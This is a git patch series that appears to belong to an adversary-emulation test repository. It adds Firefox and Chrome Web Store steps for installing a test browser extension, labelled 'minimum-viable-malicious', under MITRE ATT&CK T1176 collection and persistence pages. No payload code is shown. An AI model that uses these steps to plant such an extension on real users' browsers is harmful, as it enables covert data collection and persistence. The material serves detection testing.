Mon, 26 Feb 2018 15:16:12 +1100 Subject: [PATCH 09/10] add instructions for Firefox --- Linux/Collection/Browser_Extensions.md | 10 +++++++++- Linux/Persistence/Browser_Extensions.md | 10 +++++++++- Mac/Collection/Browser_Extensions.md | 10 +++++++++- Mac/Persistence/Browser_Extensions.md | 10 +++++++++- Windows/Collection/Browser_Extensions.md | 10 +++++++++- Windows/Persistence/Browser_Extensions.md | 10 +++++++++- 6 files changed, 54 insertions(+), 6 deletions(-) diff --git a/Linux/Collection/Browser_Extensions.md b/Linux/Collection/Browser_Extensions.md index f38f59f4..c99e7c63 100644 --- a/Linux/Collection/Browser_Extensions.md +++ b/Linux/Collection/Browser_Extensions.md @@ -9,4 +9,12 @@ Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode' Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/) -Then click 'Select' \ No newline at end of file +Then click 'Select' + +### Firefox + +Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on" + +Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json) + +Then click 'Open' \ No newline at end of file diff --git a/Linux/Persistence/Browser_Extensions.md b/Linux/Persistence/Browser_Extensions.md index f38f59f4..c99e7c63 100644 --- a/Linux/Persistence/Browser_Extensions.md +++ b/Linux/Persistence/Browser_Extensions.md @@ -9,4 +9,12 @@ Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode' Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/) -Then click 'Select' \ No newline at end of file +Then click 'Select' + +### Firefox + +Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on" + +Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json) + +Then click 'Open' \ No newline at end of file diff --git a/Mac/Collection/Browser_Extensions.md b/Mac/Collection/Browser_Extensions.md index f38f59f4..c99e7c63 100644 --- a/Mac/Collection/Browser_Extensions.md +++ b/Mac/Collection/Browser_Extensions.md @@ -9,4 +9,12 @@ Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode' Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/) -Then click 'Select' \ No newline at end of file +Then click 'Select' + +### Firefox + +Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on" + +Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json) + +Then click 'Open' \ No newline at end of file diff --git a/Mac/Persistence/Browser_Extensions.md b/Mac/Persistence/Browser_Extensions.md index f38f59f4..c99e7c63 100644 --- a/Mac/Persistence/Browser_Extensions.md +++ b/Mac/Persistence/Browser_Extensions.md @@ -9,4 +9,12 @@ Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode' Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/) -Then click 'Select' \ No newline at end of file +Then click 'Select' + +### Firefox + +Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on" + +Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json) + +Then click 'Open' \ No newline at end of file diff --git a/Windows/Collection/Browser_Extensions.md b/Windows/Collection/Browser_Extensions.md index f38f59f4..c99e7c63 100644 --- a/Windows/Collection/Browser_Extensions.md +++ b/Windows/Collection/Browser_Extensions.md @@ -9,4 +9,12 @@ Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode' Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/) -Then click 'Select' \ No newline at end of file +Then click 'Select' + +### Firefox + +Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on" + +Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json) + +Then click 'Open' \ No newline at end of file diff --git a/Windows/Persistence/Browser_Extensions.md b/Windows/Persistence/Browser_Extensions.md index f38f59f4..c99e7c63 100644 --- a/Windows/Persistence/Browser_Extensions.md +++ b/Windows/Persistence/Browser_Extensions.md @@ -9,4 +9,12 @@ Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode' Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/) -Then click 'Select' \ No newline at end of file +Then click 'Select' + +### Firefox + +Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on" + +Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json) + +Then click 'Open' \ No newline at end of file From 3e4ba89cf472aa88518eea3a85b4469bcc3bbcb5 Mon Sep 17 00:00:00 2001 From: Dan Bourke Date: Mon, 26 Feb 2018 16:26:56 +1100 Subject: [PATCH 10/10] adding actually published extension details --- Linux/Collection/Browser_Extensions.md | 6 +++++- Linux/Persistence/Browser_Extensions.md | 6 +++++- Mac/Collection/Browser_Extensions.md | 6 +++++- Mac/Persistence/Browser_Extensions.md | 6 +++++- Windows/Collection/Browser_Extensions.md | 6 +++++- Windows/Persistence/Browser_Extensions.md | 6 +++++- 6 files changed, 30 insertions(+), 6 deletions(-) diff --git a/Linux/Collection/Browser_Extensions.md b/Linux/Collection/Browser_Extensions.md index c99e7c63..3550fb8c 100644 --- a/Linux/Collection/Browser_Extensions.md +++ b/Linux/Collection/Browser_Extensions.md @@ -3,7 +3,7 @@ MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176) -### Chrome +### Chrome (Developer Mode) Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'. @@ -11,6 +11,10 @@ Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloa Then click 'Select' +### Chrome (Chrome Web Store) + +Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome' + ### Firefox Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on" diff --git a/Linux/Persistence/Browser_Extensions.md b/Linux/Persistence/Browser_Extensions.md index c99e7c63..3550fb8c 100644 --- a/Linux/Persistence/Browser_Extensions.md +++ b/Linux/Persistence/Browser_Extensions.md @@ -3,7 +3,7 @@ MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176) -### Chrome +### Chrome (Developer Mode) Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'. @@ -11,6 +11,10 @@ Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloa Then click 'Select' +### Chrome (Chrome Web Store) + +Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome' + ### Firefox Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on" diff --git a/Mac/Collection/Browser_Extensions.md b/Mac/Collection/Browser_Extensions.md index c99e7c63..3550fb8c 100644 --- a/Mac/Collection/Browser_Extensions.md +++ b/Mac/Collection/Browser_Extensions.md @@ -3,7 +3,7 @@ MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176) -### Chrome +### Chrome (Developer Mode) Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'. @@ -11,6 +11,10 @@ Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloa Then click 'Select' +### Chrome (Chrome Web Store) + +Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome' + ### Firefox Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on" diff --git a/Mac/Persistence/Browser_Extensions.md b/Mac/Persistence/Browser_Extensions.md index c99e7c63..3550fb8c 100644 --- a/Mac/Persistence/Browser_Extensions.md +++ b/Mac/Persistence/Browser_Extensions.md @@ -3,7 +3,7 @@ MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176) -### Chrome +### Chrome (Developer Mode) Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'. @@ -11,6 +11,10 @@ Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloa Then click 'Select' +### Chrome (Chrome Web Store) + +Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome' + ### Firefox Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on" diff --git a/Windows/Collection/Browser_Extensions.md b/Windows/Collection/Browser_Extensions.md index c99e7c63..3550fb8c 100644 --- a/Windows/Collection/Browser_Extensions.md +++ b/Windows/Collection/Browser_Extensions.md @@ -3,7 +3,7 @@ MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176) -### Chrome +### Chrome (Developer Mode) Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'. @@ -11,6 +11,10 @@ Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloa Then click 'Select' +### Chrome (Chrome Web Store) + +Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome' + ### Firefox Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on" diff --git a/Windows/Persistence/Browser_Extensions.md b/Windows/Persistence/Browser_Extensions.md index c99e7c63..3550fb8c 100644 --- a/Windows/Persistence/Browser_Extensions.md +++ b/Windows/Persistence/Browser_Extensions.md @@ -3,7 +3,7 @@ MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176) -### Chrome +### Chrome (Developer Mode) Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'. @@ -11,6 +11,10 @@ Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloa Then click 'Select' +### Chrome (Chrome Web Store) + +Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome' + ### Firefox Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on"